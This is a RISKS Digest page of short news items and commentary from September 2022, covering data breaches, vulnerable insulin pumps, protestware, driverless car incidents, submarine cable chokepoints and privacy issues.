Please try the URL privacy information feature enabled by clicking the flashlight icon above. This will reveal two icons after each link the body of the digest. The shield takes you to a breakdown of Terms of Service for the site - however only a small number of sites are covered at the moment. The flashlight take you to an analysis of the various trackers etc. that the linked site delivers. Please let the website maintainer know if you find this useful or not. As a RISKS reader, you will probably not be surprised by what is revealed…
https://www.cbc.ca/news/world/antonio-guterres-1.6588574 He also warned of what he called "a forest of red flags" around new technologies despite promising advances to heal diseases and connect people. Guterres said social media platforms are based on a model "that monetizes outrage, anger, and negativity." Artificial intelligence, he said, "is compromising the integrity of information systems, the media, and indeed democracy itself."
At a high-profile meeting in Geneva, international negotiators are moving closer toward developing rules for space actors in low Earth orbit and beyond. https://www.wired.com/story/the-un-wants-to-curb-anti-satellite-missile-tests/
Although the insulin pumps are not accessible via the Internet, they are vulnerable via pairing from near-by devices. Causing the pump to deliver either too much or too little insulin can be life-threatening. https://www.healio.com/news/endocrinology/20220920/fda-warns-of-possible-cybersecurity-risk-with-medtronic-minimed-600-series-insulin-pumps
Optus is Australia's second largest Telco. https://www.abc.net.au/news/2022-09-23/optus-rejects-claim-hack-likely-result-of-human-error/101468846 https://www.abc.net.au/news/2022-09-25/new-security-measures-to-be-unveiled-following-optus-data-breach/101472364
https://www.theverge.com/2022/9/20/23363345/tesla-megapack-battery-fire-california-monterey-pg-and-e
At least three driverless Cruise cars were responsible for holding up traffic and reportedly blocking a bus lane in San Francisco last week, the latest in a string of incidents involving the locally headquartered self-driving car company. A video shared on Reddit showed two of Cruise's vehicles at a standstill Thursday evening, near the intersection of Sacramento and Leavenworth streets, with their hazard lights flashing. A Muni bus appeared to be stalled about a block behind them. “Come on, we've got to get the f*** going,'' one person could be heard yelling in the background of the video. “There's no driver!'' another responded. https://www.sfgate.com/local/article/driverless-cruise-cars-block-SF-traffic-17467985.php
Automakers are ignoring the simple solution to the rise of traffic deaths https://www.theverge.com/23360839/cars-speed-safety-traffic-deaths-technology-usdot
Sebastian Moss, Datacenter Dynamics, 15 Sep 2022 Understanding the Middle East bottleneck, and how things could be set to change https://www.datacenterdynamics.com/en/analysis/egypts-submarine-cable-stranglehold/ The world's digital infrastructure has been built by the paranoid. At every turn, equipment is duplicated, routes are triplicated, fuel reserves are over-filled. Astronomical sums are spent on building layers and layers of safety into the system, as suspicious minds game out various scenarios that could put the precious flow of data at risk. And yet, there remains one giant bottleneck, a quirk of geography and geopolitics, that is anything but redundant. If you take a map of the world's submarine cable infrastructure, responsible for shuttling data between nations and entire continents, and zoom in on the Middle East, you will notice something striking: Everything goes through Egypt. Data traveling to and from Europe and Asia, as well as Northern Africa and the Middle East itself, has just one route. Coming from the Gulf of Aden, cables snake up along the Red Sea, and into the Gulf of Suez. There, they make landfall in Egypt, traversing little more than a hundred miles, before breaking out into the Mediterranean Sea. "There's no way a network operator would design their network like this under ideal conditions, right?" said Paul Brodsky, senior analyst at Telegeography, best known for its maps of cable routes. "They don't like having everything funneled through one place." This route concentration is a concern for reliability, putting an estimated 17 percent of the world's Internet traffic in the hands of one country, and in one shallow and narrow sea. But it is also a concern for businesses, which have to contend with a monopoly. To get through Egypt, companies have to pay exorbitant fees to state-owned Telecom Egypt. Prices have risen dramatically, amid claims of corruption, but operators have had little choice but to pay. At least until now. The only route The story of Egypt's submarine stranglehold is hard to tell. Several analysts declined to talk on the record due to business relationships with Telecom Egypt. Cable providers either declined to talk, or did not respond to requests for comment. “I am afraid I won't be open to discuss the Egyptian submarine cable bottleneck due to certain concerns,'' another industry figure said, declining to elaborate. In Egypt itself, it's even harder to talk about the cable situation. In 2019, the TV host of local news program 90 minutes, Ossama Kamal, accused the government of corruption with the way it charges submarine cable operators, and said it risked destroying its position as the gateway between Asia and Europe. Immediately following the broadcast, he was suspended from his show, fined, and forced to apologize. He did not respond to requests for comment. Whether Telecom Egypt abuses its market dominance is a matter of debate -- some, speaking on background, called fees extortionate. Others accepted it as the cost of business for using the most logical route through the Middle East, with more than a dozen major cables choosing to go across the country. Egypt's position as a critical communications node between East and West dates all the way back to the colonial era, and remains, due to a few simple reasons. First is geography: It's the shortest stretch of land between the Mediterranean and Arabian seas, hence the creation of the Suez Canal for shipping. Network operators like to avoid needlessly traveling across land, with its expensive owners and pesky national sovereignties that need to be dealt with. Then comes geopolitics. Do Western companies want data to travel through Iran? How about Iraq, Afghanistan, or Syria? Operators like to steer clear of sanctioned nations, or active war zones, so they are off most people's preferred routes—although some have still tried, but we'll get to that later. There is one other journey they could take, but that too, we shall save. Finally, there are market forces. "Once you establish a route and everybody's using it, the cost goes down as more people use it," Doug Madory, director of Internet analysis at Kentik, explained. "So it's really hard not to use it, and it's hard to break out of what ends up being the most selected path. “With this Egypt chokepoint, obviously the geographic layout is the number one reason, but then once it gets established, it's super hard to break out because then there's so many cables, so many lines, so much infrastructure built along that path.'' With this in its favor, Telecom Egypt has been able to charge huge fees -- between 6.6 percent and 17.4 percent of its total revenues came from cable fees between 2008 to 2019, according to Submarine Cable Networks. The founder of SCN declined to comment. It took a while for the state telco to realize it was sitting on a goldmine: It used to sell a perpetual license for somewhere in the ballpark of $100k. Then they moved to a monthly fee, a source told DCD. "Then they said 'oh no, we want to have the transit costs, where people pay by volume of traffic." So if tomorrow traffic doubles for a telecom, they get double pay or whatever the tiering system is," Madory said. "I feel like that was too far—people started to revolt, although what can you do? It's not like there's another Egypt you can go to." Another industry figure called the fees "ridiculous." An SCN report found that 12 submarine cables crossing Egypt paid the telco at least $369 million for Indefeasible Right of Use, with additional Operation and Maintenance (O&M) charges during the lifetime - however, it is not clear if this is before the telco tried to shift to charging more for more traffic. [Long item. The rest is PGN-truncated for RISKS.]
https://techxplore.com/news/2022-09-protestware-programmers-self-sabotaging-code .html "In March 2022, the author of node-ipc, a software library with over a million weekly downloads, deliberately broke their code. If the code discovers it is running within Russia or Belarus, it attempts to replace the contents of every file on the user's computer with a heart emoji." Open-source software dependencies are ubiquitous. Most, if not all, open-source components are adopted and integrated without substantial or any code review. Never mind the details, get that stack to work and sell, sell, sell. [...] NIST's "Security and Privacy Controls for Information Systems and Organizations" identifies two control family items emphasizing code reviews as a method for reducing cybersecurity risks: RA-5 (Vulnerability Monitoring and Scanning), SA-11 (Developer Testing and Evaluation). (https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-53r5.pdf) Intentional sabotage/service denial based on conditional run-time factors: location of use, date/time of day, ip address/domain, etc. Extremely nefarious risk.
https://www.sec.gov/news/press-release/2022-168 The Securities and Exchange Commission today announced charges against Morgan Stanley Smith Barney LLC (MSSB) stemming from the firm's extensive failures, over a five-year period, to protect the personal identifying information, or PII, of approximately 15 million customers. MSSB has agreed to pay a $35 million penalty to settle the SEC charges. The SEC' order finds that, as far back as 2015, MSSB failed too properly dispose of devices containing its customers' PII. On multiple occasions, MSSB hired a moving and storage company with no experience or expertise in data destruction services to decommission thousands of hard drives and servers containing the PII of millions of its customers. Moreover, according to the SEC's order, over several years, MSSB failed to properly monitor the moving company's work. The staff's investigation found that the moving company sold to a third party thousands of MSSB devices including servers and hard drives, some of which contained customer PII, and which were eventually resold on an Internet auction site without removal of such customer PII. While MSSB recovered some of the devices, which were shown to contain thousands of pieces of unencrypted customer data, the firm has not recovered the vast majority of the devices. [Long item. The rest is PGN-truncated for RISKS. Also, Matthew Kruk noted a NYTimes item on this issue: Morgan Stanley Hard Drives With Client Data Turn Up on Auction Site https://www.nytimes.com/2022/09/20/us/morgan-stanley-smith-barney-settlement.html PGN]
Suffolk County Asks NYPD for Help After Hack Cripples 911 Call Center and Police HQ Ten days after a cyber attack hit Suffolk County computers, much of the county's police department is still deeply feeling the effects—and is calling on the NYPD for backup. The 911 dispatch center at the Suffolk County Police Department headquarters has been reduced to using pen and paper, after hackers took down the county government's computers. "Unfortunately had to go back to our old system where information is recorded by hand and information is handed to the dispatcher, in contrast to putting it into a computer-aided system," said Suffolk County Police Commissioner Rodney Harrison. [...] And it's not just police hurting as a result. Title searches, an essential part of real estate closings, have been frozen too. Lawyers and buyers are trying to proceed with caution. https://www.nbcnewyork.com/news/local/suffolk-county-hack-cripples-911-call-center-and-police-hq-as-they-turn-to-nypd-for-help/3871797/
https://www.engadget.com/american-airlines-data-breach-customer-employee-data-180132383.html?src=rss
https://www.bleepingcomputer.com/news/security/lastpass-says-hackers-had-internal-access-for-four-days/
Ionut Ilascu, BleepingComputer*, 21 Sep 2022 via ACM Tech News 23 Sep 2022 An unpatched 15-year-old bug in the Python programming language could affect more than 350,000 open-source repositories, and could lead to code execution. The path traversal vulnerability, disclosed in 2007, resides in the Python tarfile package, and can allow hackers to overwrite arbitrary files. The flaw exists because the code in the extract function in Python's tarfile module trusts data in the TarInfo object "and joins the path that is passed to the extract function and the name in the TarInfo object." Analyst Charles McFarland at extended detection and response solutions provider Trellix rediscovered the bug while probing another security issue. No reports indicate the bug has been exploited in attacks, although it remains a threat in the software supply chain. https://orange.hosting.lsoft.com/trk/click?ref=znwrbbrs9_6-2f446x23641bx070841&
Late last week, a California-based AI artist who goes by the name Lapine discovered private medical record photos taken by her doctor in 2013 referenced in the LAION-5B image set, which is a scrape of publicly available images on the web. AI researchers download a subset of that data to train AI image synthesis models such as Stable Diffusion and Google Imagen. https://arstechnica.com/information-technology/2022/09/artist-finds-private-medical-record-photos-in-popular-ai-training-data-set/
So Uber is apparently blaming a contractor (sure, blame the contractor, so
typical) for the fact that Uber's corp network was so easily & broadly
penetrated by a hacker. If they had been using U2F keys & "zero trust"
security it's hard to see how this hack could have occurred. -L
[Monty Solomon noted this item:
Uber links breach to Lapsus$ group, blames contractor for hack
https://www.bleepingcomputer.com/news/security/uber-links-breach-to-lapsus-group-blames-contractor-for-hack/
PGN]
https://www.cbc.ca/news/canada/toronto/luxury-cars-seized-crypto-king-investors- try-recoup-millions-1.6583982 Two McLarens, two BMWs and a Lamborghini make up just a few of the $2M worth of assets seized from a 23-year-old from Whitby, Ont., as his investors try to recoup millions of dollars they handed over to the self-described *Crypto King*. But so far, Aiden Pleterski's assets fall far short of what his investors claim they're owed. Creditors are working to unravel where at least $35 million provided to Pleterski and his company AP Private Equity Limited for cryptocurrency and foreign exchange investments ended up, according to a fraud recovery lawyer and documents filed in two separate actions reviewed by CBC Toronto.
https://techcrunch.com/2022/09/20/33-of-u-s-tiktok-users-say-they-regularly-get-their-news-on-the-app-up-from-22-in-2020/
What the hell else would you expect from a Chinese search engine? -L https://www.cnn.com/2022/09/18/business/tiktok-search-engine-misinformation/index.html
The vast majority of "fake invoice" phishing attacks (the ones that ask you to call a phone number to cancel a "renewal" for example, where they then ask for credit card info, etc.) appear to source from @gmail addresses. Piles of them every day being sent to non-Gmail addresses. -L
Self-checkout systems are intended to make shopping convenient, but they also can lead to more thefts, experts said. https://www.nytimes.com/2022/09/18/business/wegmans-self-checkout-shoplifting.html
Tatum Hunter and Jeremy B. Merrill, *The Washington Post*, 22 Sep 2022 https://www.washingtonpost.com/technology/2022/09/22/health-apps-privacy/ From depression to HIV, we found popular health apps sharing potential health concerns and user identifiers with dozens of ad companies.
The recommendation also calls for systems to monitor a driver's behavior, making sure they're alert. She said many cars now have cameras pointed at the driver, which have the potential to limit impaired driving. But Homendy says she also understands that perfecting the alcohol tests will take time. "We also know that it's going to take time for NHTSA to evaluate what technologies are available and how to develop a standard." https://www.npr.org/2022/09/20/1124171320/autos-drunk-driving-blood-alcohol-system-ntsb Interesting there's no mention of developments in driver assistance features, let alone attempting autonomous driving.
How vigilante *predator catchers* are infiltrating the criminal justice system. It began with a live-streamed shaming in an Olive Garden parking lot. It ended with an Indiana cop on trial for child solicitation. https://www.washingtonpost.com/dc-md-va/2022/09/22/prredator-catchers-vigilante-justice/
https://www.washingtonpost.com/politics/2022/09/22/senators-introduce-bill-prote ct-open-source-software/ ALSO: Lawmakers introduce bill to tackle open-source software https://www.axios.com/2022/09/23/open-source-software-log4j-senate-bill [Protecting it sounds like what the offense does. Tackling it sounds what the defense does to the offense. I find the defensive second title *offensive*! PGN]
Liam Tung, *ZDNet*, 21 Sep 2022 via ACM Tech News 23 Sep 2022 GitHub has completed the construction of its Arctic Code Vault, a 21-terabyte snapshot of all public software repositories mainly encoded in quick response codes and located 250 meters (820 feet) within a mountain in Svalbard, Norway. The GitHub Archive Program's Jon Evans said, "Our hope is that by storing and indexing millions of repositories, we have captured a valuable cross-section of the world of modern software." The archive is designed to last a millennium, with the snapshot stored on more than 180 film reels. A nearly 1.5-ton steel box contains the archive, and is decorated with artificial intelligence-generated etchings to entice future generations. Evans said the vault could potentially help someone who may need software that is otherwise lost, and also will serve as a historical record. https://orange.hosting.lsoft.com/trk/click?ref=znwrbbrs9_6-2f446x23641ex070841&
UN countries are preparing to pick a new head of the International Telecommunications Union. Who wins could shape the open Web's future. Authoritarian states like China, Cordell wrote, "have increased their interest and activism in the ITU, leading to concerns that their outsized influence in standards setting may lead to the bifurcation of the Internet. His time at the helm of the organization, according to Cordell, has been marked by "highly favorable comments and decisions in support of Chinese companies." Huawei alone has submitted some 2,000 new standards proposals to the organization, according to Cordell. https://www.wired.com/story/2022-itu-secretary-general-election
Please report problems with the web pages to the maintainer